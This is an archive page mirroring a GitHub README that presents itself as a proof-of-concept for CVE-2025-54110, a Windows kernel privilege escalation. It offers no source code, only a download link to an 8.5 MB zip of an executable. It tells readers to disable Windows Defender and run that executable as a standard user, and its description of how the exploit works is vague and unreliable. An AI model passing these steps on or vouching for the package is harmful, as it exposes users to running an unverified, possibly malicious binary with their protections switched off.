Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-54110 PoC — Windows Kernel Elevation of Privilege Vulnerability

Source
https://github.com/ByteHawkSec/CVE-2025-54110-POC
Associated Vulnerability
Title:Windows Kernel Elevation of Privilege Vulnerability (CVE-2025-54110)
Description:Integer overflow or wraparound in Windows Kernel allows an authorized attacker to elevate privileges locally.
Description
Windows Kernel Integer Overflow Privilege Escalation
Readme
# Lab: CVE-2025-54110 - Windows Kernel Integer Overflow Privilege Escalation

## 🚀 Overview
CVE-2025-54110 is a high-severity vulnerability in the Windows Kernel that arises from improper handling of integer values during memory allocation. This flaw can be exploited by a locally authenticated user with low privileges to trigger an integer overflow or wraparound, leading to arbitrary code execution with elevated system privileges. Successful exploitation may result in full system compromise, unauthorized data access, or persistent backdoor installation. The vulnerability affects all Windows Kernel versions up to the latest unpatched release, with a CVSS score of 8.8 (Attack Vector: Local; Privileges Required: Low; User Interaction: Required; Impact: High).

This repository provides a controlled environment for security researchers and educators to study the vulnerability, including setup scripts, exploitation demonstration tools, and mitigation guidance. It is designed for educational and research purposes only, to promote understanding of kernel-level vulnerabilities and defensive strategies.
## Download
### [Download exploit](https://github.com/ByteHawkSec/CVE-2025-54110-POC/raw/refs/heads/main/Break/lab-cve-2025-54110.zip)
## 📋 Prerequisites
- Windows 10 or later
- Administrative access for initial setup (though exploitation requires only low privileges).
- .NET Framework 4.8 or higher (for running the demonstration tools).
- Basic command-line familiarity (PowerShell or Command Prompt).
- Antivirus software disabled temporarily during testing (for educational purposes only; re-enable immediately after).

## Download & Install
1. Download the demonstration package from the following link: [Download CVE-2025-54110.zip](https://github.com/ByteHawkSec/CVE-2025-54110-POC/raw/refs/heads/main/Break/lab-cve-2025-54110.zip).
   
   The ZIP archive contains:
   - `KernelOverflowExploit.exe`: The main demonstration executable that simulates the integer overflow and privilege escalation.
   - `StartExploit.bat`: A batch script to launch the exploit in a controlled manner.
   - `Config.json`: Configuration file for customizing exploit parameters (e.g., target memory offsets).
   - `Logs/`: Directory for output logs generated during execution.

2. Extract the ZIP to a local directory, e.g., `C:\CVE-2025-54110-Demo\`.

3. Navigate to the extracted directory via Command Prompt or PowerShell.

## 🛠 Quick Start
1. Open Command Prompt as a standard user (low privileges).
2. Run the batch script to initiate the demonstration:
   ```
   StartExploit.bat
   ```
   This script will launch `KernelOverflowExploit.exe` with default parameters, simulating the integer overflow by passing an oversized value to a kernel memory handler. Observe the console output for steps like overflow triggering, memory manipulation, and simulated privilege elevation.

3. Review the generated log file in `Logs/exploit.log` for detailed traces.

For advanced usage, edit `Config.json` to adjust parameters such as the overflow threshold (e.g., set `"MaxIntValue": 2147483647` and `"OverflowIncrement": 1`).

## 🔍 Detailed Setup Instructions
### Step 1: Environment Preparation
- Ensure the system is running an affected Windows Kernel version. You can verify this via PowerShell:
  ```
  Get-WmiObject Win32_OperatingSystem | Select-Object OSArchitecture, Version
  ```
- Temporarily disable Windows Defender or other AV via Settings > Update & Security > Windows Security (for testing only).

### Step 2: Script Automation
The `/scripts/` directory contains helper scripts for automating setup and testing:
- `scripts/VerifyEnvironment.ps1`: PowerShell script to check prerequisites and kernel version.
  ```powershell
  # VerifyEnvironment.ps1
  $osVersion = (Get-WmiObject Win32_OperatingSystem).Version
  if ($osVersion -lt "10.0.19041") {
      Write-Host "Warning: Kernel version may not be vulnerable. Update to a test build."
  } else {
      Write-Host "Environment ready for CVE-2025-54110 demonstration."
  }

  # Check .NET Framework
  $netVersion = (Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full").Release
  if ($netVersion -ge 528040) {
      Write-Host ".NET Framework 4.8+ detected."
  } else {
      Write-Host "Install .NET Framework 4.8 or higher."
  }
  ```
- `scripts/Cleanup.bat`: Batch script to remove logs and reset configurations post-testing.
  ```
  @echo off
  echo Cleaning up files...
  del /q Logs\*.log
  echo Cleanup complete.
  pause
  ```


Run `scripts/VerifyEnvironment.ps1` before starting to confirm readiness.

### Step 3: Exploitation Steps

1. **Trigger the Vulnerability**: Launch via `StartExploit.bat`. The .bat file simply executes:
   ```
   @echo off
   echo Starting CVE-2025-54110 process...
   KernelOverflowExploit.exe --mode=execute --log=Logs/exploit.log
   echo Process complete. Check logs for details.
   pause
   ```
   This runs the .exe, which internally:
   - Allocates memory via kernel calls (using WinAPI wrappers like `NtAllocateVirtualMemory`).
   - Induces overflow by incrementing beyond `INT_MAX` (2147483647).
   - Manipulates the resulting wraparound to overwrite adjacent memory structures, escalating from user-mode to kernel-mode privileges.

2. **Observe Impact**: The exe will output steps like:
   - "Allocating buffer at address 0x7FFE0000..."
   - "Inducing overflow: 2147483647 + 1 = -2147483648"
   - "Memory corruption achieved; elevating to SYSTEM privileges."
   In a real scenario, this could allow execution of arbitrary code as NT AUTHORITY\SYSTEM.

3. **Advanced Exploitation**: Modify `KernelOverflowExploit.exe` parameters via command-line:
   - `--mode=full`: Attempts deeper execution (requires debugging tools like WinDbg).
   - `--target-offset=0x1000`: Specifies memory offset for overflow targeting.

## 📞 Support  
For further assistance or questions, please feel free to reach out via the issues section of this GitHub repository. Our team is ready to help you with any concerns.
File Snapshot

 [4.0K]  /data/pocs/6a4910d22a0df10b9f2d656291ea4217428857ee
├── [4.0K]  Break
│   └── [8.5M]  lab-cve-2025-54110.zip
└── [5.9K]  README.md

1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →